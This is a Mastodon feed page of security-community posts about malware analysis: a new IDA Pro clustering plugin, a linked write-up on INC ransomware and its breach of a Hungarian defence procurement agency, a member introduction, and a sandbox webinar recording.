Thomas Roccia :verified:<p>🎁 GenAI x Sec Advent #14</p><p>Mandiant has just released XRefer, an open-source IDA Pro plugin that clusters binary functions and leverages Gemini and other models for the analysis.</p><p>The tool can generate a ‘map’ of a binary, to assist analysts to understand the structure of the binary. 👨💻</p><p>In the demo below, you can see how the tool clusters parts of the binary and adds additional details by malware functionalities such as command execution, C2 communication, or encryption. 👇</p><p>I haven’t tried it yet, but it looks promising! 🤩</p><p>➡️ <a href="https://github.com/mandiant/xrefer" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">github.com/mandiant/xrefer</span><span class="invisible"></span></a></p><p><a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/GenAI" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>GenAI</span></a> <a href="https://infosec.exchange/tags/reverseengineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reverseengineering</span></a></p>
buherator<p>My friends at Ravenfortech wrote an introductory <a class="hashtag" href="https://infosec.place/tag/malwareanalysis" rel="nofollow noopener" target="_blank">#malwareanalysis</a> post on the INC <a class="hashtag" href="https://infosec.place/tag/ransomware" rel="nofollow noopener" target="_blank">#Ransomware</a>:</p><p><a href="https://translate.kagi.com/https://scribe.rip/@ravenfortech/inc-ransomware-elemz%C3%A9s-a909b5aed114" rel="nofollow noopener" target="_blank">https://translate.kagi.com/https://scribe.rip/@ravenfortech/inc-ransomware-elemz%C3%A9s-a909b5aed114</a></p><p>This gang recently pwned the Hungarian company responsible for military procurement (VBÜ) and now selling the data for $1M.</p><p><a href="https://444.hu/2024/12/01/visszakerultek-a-netre-a-vedelmi-beszerzesi-ugynokseg-ellopott-adatai-egymillio-dollarrol-indul-a-licit" rel="nofollow noopener" target="_blank">https://444.hu/2024/12/01/visszakerultek-a-netre-a-vedelmi-beszerzesi-ugynokseg-ellopott-adatai-egymillio-dollarrol-indul-a-licit</a></p><p>Based on the analysis the malware is very simple. INC uses 2023 CitrixBleed (2023) and spear phishing for initial access: </p><p><a href="https://www.sentinelone.com/anthology/inc-ransom/" rel="nofollow noopener" target="_blank">https://www.sentinelone.com/anthology/inc-ransom/</a></p><p>This doesn’t paint a picture of mature security at VBÜ to say the least…</p>
loneicewolf<p>I accidentally removed this; 1 sec</p><p>Hello! I just joined, a friend mentioned this nice social and I just joined. Happy to be here! a small intro: I am 24 years old, I am always into reverse engineering. More specifically - malware reversing. Including Rootkits, EQGRP stuff, and such. Nice to meet everyone! </p><p>If needed, my github is this:<br><a href="https://github.com/loneicewolf" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">github.com/loneicewolf</span><span class="invisible"></span></a><br>(I always include it in intro's)</p><p>❤️ Wishes and Saluting Sweden!<br>DMS/PMS open; if needed ^_^ 🌹</p><p><a href="https://defcon.social/tags/intro" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>intro</span></a> <a href="https://defcon.social/tags/introduction" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>introduction</span></a> <a href="https://defcon.social/tags/revers" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>revers</span></a> <a href="https://defcon.social/tags/reverseengineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reverseengineering</span></a> <a href="https://defcon.social/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://defcon.social/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a></p>
MalwareLab<p>Recording from the last week <a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ANYRUN</span></a> webinar is here. Almost no marketing slides, mostly live demo of technical capabilities of <a href="https://infosec.exchange/tags/sandbox" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>sandbox</span></a>. Good introduction of behavioral analysis for <a href="https://infosec.exchange/tags/cybersec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersec</span></a> students and practicioners without deep knowledge in <a href="https://infosec.exchange/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a>. </p><p>📽️ recording: <a href="https://event.webinarjam.com/replay/2/ngl5pt5imhvhvk9" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">event.webinarjam.com/replay/2/</span><span class="invisible">ngl5pt5imhvhvk9</span></a></p><p>📚 guide: <a href="https://files.any.run/images/malware_analysis_in_ANY.RUN_ultimate_guide.pdf" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">files.any.run/images/malware_a</span><span class="invisible">nalysis_in_ANY.RUN_ultimate_guide.pdf</span></a></p>
Live feeds
Mastodon is the best way to keep up with what's happening.
Follow anyone across the fediverse and see it all in chronological order. No algorithms, ads, or clickbait in sight.
LoginDrag & drop to upload